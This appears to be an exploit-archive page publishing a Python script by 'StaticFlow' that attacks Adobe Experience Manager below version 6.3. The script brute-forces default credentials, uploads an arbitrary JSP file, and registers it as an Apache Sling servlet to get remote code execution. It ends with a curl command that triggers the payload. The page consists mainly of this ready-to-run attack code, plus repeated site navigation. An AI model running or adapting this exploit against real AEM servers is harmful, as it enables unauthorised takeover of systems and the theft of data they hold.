Adobe Experience Manager (AEM) Remote Code Execution

Adobe Experience Manager (AEM) Remote Code Execution: Posted May 20, 2018; Authored by StaticFlow; Default credentials in Adobe Experience Manager (AEM) versions prior to 6.3 can lead to remote code execution.; tags | exploit, remote, code execution; SHA-256 | bb68169b4ed36407d54db33f7cdfed0f3ade75d95789e74c0c54cb1b44fcd9ff; Download | Favorite | View

Adobe Experience Manager (AEM) Remote Code Execution

# Exploit Title: Adobe Experience Manager (AEM) < 6.3 default credentials leads to RCE
# Date: 5/19/18
# Exploit Author: StaticFlow
# Vendor Homepage: https://www.adobe.com/in/marketing-cloud/experience-manager.html
# Version: < 6.3
import requests
import sys
 
baseUrl = 'https://test.com/' #default domain, change here or pass in on command line
credentialList = [['anonymous','anonymous'], ['author','author'], ['admin','admin']]
exploit = 'rce.jsp' #default file name, must be in same dir as python file or passed in on command line
 
def testLogins():
    for credential in credentialList:
        response = requests.get(baseUrl, auth=(credential[0], credential[1]))
        if(response.status_code == 200):
            return credential
    return False
 
if len(sys.argv) == 2:
    baseUrl = sys.argv[1]
if len(sys.argv) == 3:
    exploit = sys.argv[2]
 
gotCreds = testLogins()
if(gotCreds):
    attackChain = [
        {
            'jcr:primaryType': (None, 'nt:folder') #create a folder for our exploit
        },
        {
            'exec.jsp': ('rce.jsp', open(exploit, 'rb')) #upload the exploit
        },
        {
            ':operation': (None, 'copy'), #copy exploit folder over to app folder for staging
            ':dest': (None, '/apps/rcetype')
        },
        {
            'sling:resourceType': (None, 'rcetype') #instruct Apache Sling to initialize our exploit code as a servlet
        }
    ]
    print "creating folder structure and uploading exploit"
    for attack in attackChain[:-1]:
        response = requests.post(baseUrl+'content/rcetype', files=attack, auth=(gotCreds[0], gotCreds[1]))
        if response.status_code > 201:
            print "Something went wrong, request returned a "+str(response.status_code)+". Here's the response:"
            print response.content
            sys.exit(0)
 
    print "initializing servlet from exploit"
    response = requests.post(baseUrl+'content/rce', files=attackChain[-1], auth=(gotCreds[0], gotCreds[1]))
    if response.status_code > 201:
        print "Something went wrong, request returned a "+str(response.status_code)+". Here's the response:"
        print response.content
        sys.exit(0)
    print """Should be good to go, run 'curl -X "GET" -u {}:{} {}' and your exploit should run""".format(gotCreds[0],gotCreds[1],baseUrl+'content/rce.exec')

Top Authors In Last 30 Days

Red Hat 184 files
Ubuntu 64 files
Debian 22 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Google Security Research 6 files
Apple 6 files
malvuln 4 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,009)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,174)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,460)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,433)
UNIX (9,390)
UnixWare (187)
Windows (6,648)
Other

Adobe Experience Manager (AEM) Remote Code Execution

Adobe Experience Manager (AEM) Remote Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Adobe Experience Manager (AEM) Remote Code Execution

Share This

Adobe Experience Manager (AEM) Remote Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems